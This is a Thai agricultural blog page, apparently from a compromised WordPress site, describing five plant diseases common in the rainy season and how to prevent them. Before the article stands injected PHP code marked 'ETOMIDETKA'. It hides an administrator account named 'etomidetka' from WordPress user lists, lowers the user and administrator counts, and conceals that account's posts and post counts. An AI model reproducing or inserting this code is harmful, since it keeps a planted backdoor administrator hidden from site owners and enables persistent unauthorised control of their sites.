//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); รู้หรือไม่? 5 โรคพืชที่มาพร้อมกับหน้าฝน - farrtosquare

farrtosquare

รู้หรือไม่? 5 โรคพืชที่มาพร้อมกับหน้าฝน

ช่วงหน้าฝนที่สภาพอากาศแปรปรวนนี้ นอกจากระวังโรคต่างๆจากคนแล้ว ยังต้องระวังโรคพืชที่นิยมมาพร้อมกับหน้าฝนนี้จะมีอะไรบ้าง และแนวทางแก้ไขอย่างไร ฟาร์โต้สแควร์ มาให้ทำตอบกันแล้ว!

โรคพืชยอดฮิตที่มาพร้อมกับหน้าฝน

ปัญหากวนใจที่เกษตรกรต้องรับมือเข้าสู่ช่วงหน้าฝนนี้ สิ่งที่เกษตรต้องรับมือกันทุกปีคงหนีไม่พ้น โรคพืชที่มาพร้อมกับสายฝนชุ่มฉ่ำ ปริมาณน้ำที่มากขึ้น และความชื้นในอากาศที่สูงขึ้น ทำให้พืชทั้งหลายมีโอกาสเกิดเชื้อราได้ง่าย ดังนั้นการ

เตรียมความพร้อมรับมือ ก็จะสามารถช่วยป้องกัน และบรรเทาปัญหาให้เบาบางลงได้ ซึ่งเราก็มีคำแนะนำดี ๆ มาฝากกันอีกเช่นเคย

1.โรคเน่าคอดิน (Damping off)

อาการ : โรคเน่าคอดินเป็นโรคพืชที่มักพบในพืชผักระยะกล้า เข้าทำลายบริเวณโคนต้น ราก รวมถึงเมล็ดที่กำลังงอกในพืชอวบน้ำ โดยต้นกล้าจะฟุบตายเป็นหย่อม ๆ บริเวณโคนต้นจะมีลักษณะแผลช้ำ เหี่ยวแฟบ คอเป็นสีน้ำตาลดำและเน่า เป็นเหตุทำให้ต้นกล้าหักพับลง

การป้องกันกำจัด

– เตรียมแปลงให้มีการระบายน้ำดี อย่าให้น้ำขังแฉะ ใช้เมล็ดพันธุ์ดีไม่มีเชื้อจุลินทรีย์ติดมากับเมล็ด และมีความงอกสูง ไม่หว่านเมล็ดแน่นเกินไป

– ก่อนปลูกคลุกเมล็ดด้วยสารชีวภัณฑ์ อัตรา 100 กรัม : เมล็ด 1 กิโลกรัม

– สำหรับแปลงปลูกให้ปรับดินด้วยปูนขาว และปุ๋ยอินทรีย์ให้มาก ใช้เชื้อราไตรโคเดอร์มา ผสมกับดินปลูก

– ตรวจแปลงสม่ำเสมอพบต้นเป็นโรค รีบขุดเอาดินและต้นเป็นโรคทำลายหรือฝังลึกนอกแปลง

2.โรคราน้ำค้าง (Downy mildew)

อาการ : โรคราน้ำค้างเป็นโรคพืชที่ใบจะมีรอยจ้ำๆเป็นสีขาว ขอบสีน้ำตาลกระจายอยู่ทั่ว แต่บางครั้งก็เป็นสีเหลืองด่างๆ สีน้ำตาลเข้ม หรือเป็นจุดขาวๆเล็กๆ ถ้าปล่อยไว้นานๆจะทำให้พืชอ่อนแอ สร้างผลผลิตที่ดีไม่ได้ และยังอาจทำให้ต้นอ่อนตายได้ด้วย

การป้องกันกำจัด : ให้ฉีดพ่นด้วยชีวภัณฑ์ ป้องกันกำจัดเชื้อราไตรโคเดอร์มา สลับกับบีเอส ซึ่งใช้ได้ระยะที่ยังเป็นต้นกล้า – ระยะการเติบโต

3.โรคใบจุด (Alternaria leaf spot)

อาการ : โรคใบจุดเป็นโรคพืชที่มีอาการบนต้นกล้า จะเกิดเป็นแผลเล็กๆ สีน้ำตาลดำ ลักษณะคล้ายโรคเน่าคอดินที่ขึ้นกับลำต้น เมื่อเชื้อเข้าทำลายในระยะต้นกล้า จะทำให้ต้นกล้าหยุดการเจริญเติบโตหรือชะงักงัน เมื่อย้ายไปปลูกในแปลงจะทำให้ต้นไม่สมบูรณ์ อาการในต้นแก่มักพบบนใบและก้าน เกิดเป็นแผลจุดเล็กๆ สีเหลือง ต่อมาแผลขยายใหญ่ขึ้น สีน้ำตาลเข้มถึงดำ เแผลมีลักษณะเป็นวงค่อนข้างกลม เรียงซ้อนกันเป็นชั้นๆ

การป้องกันกำจัด

– ทำลายต้นเป็นโรคโดยการขุดถอนไปเผาทิ้ง

– ปลูกพืชหมุนเวียน

– ไม่ควรให้น้ำแบบฉีดพ่นฝอย

– แช่เมล็ดในน้ำอุ่น 50 องศาเซลเซียส 30 นาที (ยกเว้นกะหล่ำดอก)

– คลุกมล็ดด้วยชีวภัณฑ์ป้องกันกำจัดเชื้อราไตรโคเดอร์มา

– ฉีดพ่นสารชีวภัณฑ์ป้องกันกำจัดเชื้อรไตรโดเดอร์มา ทุกๆ 7 วันจะช่วยป้องกันกำจัดเชื้อรานี้

*เว้นใส่รูปภาพ

4.โรคราสนิมขาว (White rust)

อาการ : โรคราสนิมขาวเป็นโรคพืชที่มีจุดสีเหลืองซีดด้านบนของใบ ด้านใต้ใบตรงกันข้าม จะเป็นตุ่มนูนเล็ก ๆ ขนาด 1-2 มิลลิเมตร อาจพบลักษณะปุ่มปม หรือบวมพองโตขึ้นในส่วนของก้านใบและลำต้น

การป้องกันกำจัด

– หากเกิดโรคระบาด ให้ฉีดพ่นให้ใบด้วยไตรโคเดอร์มา สลับ กับ บีเอส อัตราที่แนะนำ หากมีฝนตกซุกให้ผสมสารจับใบ

– คลุกเมล็ดก่อนปลูกด้วยไตรโดเตอร์มา และเลือกใช้เมล็ดจากแหล่งที่ไม่มีโรคระบาดมาก่อน

– ดูแลระบบการให้น้ำในแปลงปลูก อย่าให้ขึ้นแฉะจนเกินไป

5.โรคเหี่ยว (Wilt)

อาการ : โรคเหี่ยวเป็นโรคพืชเกิดอาการเหี่ยวอย่างช้าๆ ใบที่อยู่โคนต้นเปลี่ยนเป็นสีหลืองและร่วง ต่อมาใบจะเหี่ยวทั้งต้น เมื่อผ่าลำต้นบริเวณเหนือระดับดินตามยาวจะพบว่า ท่อน้ำ ท่ออาหารเป็นสีน้ำตาล การผิดปกติของท่อน้ำ ท่ออาหารนี้จะลงไปถึงส่วนรากด้วย

การป้องกันกำจัด : ถ้าพบโรคในแปลง ต้องถอนต้นที่เป็นโรคมาทำลาย ก่อนปลูกควรปรับสภาพคืนด้วยปูนขาว และปุ๋ยคอก

เมื่อรู้แล้วว่าหน้าฝนนี้เราจะเจอโรคพืชอะไรบ้าง อย่าลืมสังเกตแปลงผักที่เราปลูกกันด้วยว่ามีอาการของโรคเหล่านี้หรือไม่ จะได้หาวิธีป้องกันกำจัดได้ทันท่วงที ลดความสูญเสียที่จะเกิดขึ้นกับผลผลิตตลอดฤดูกาลนี้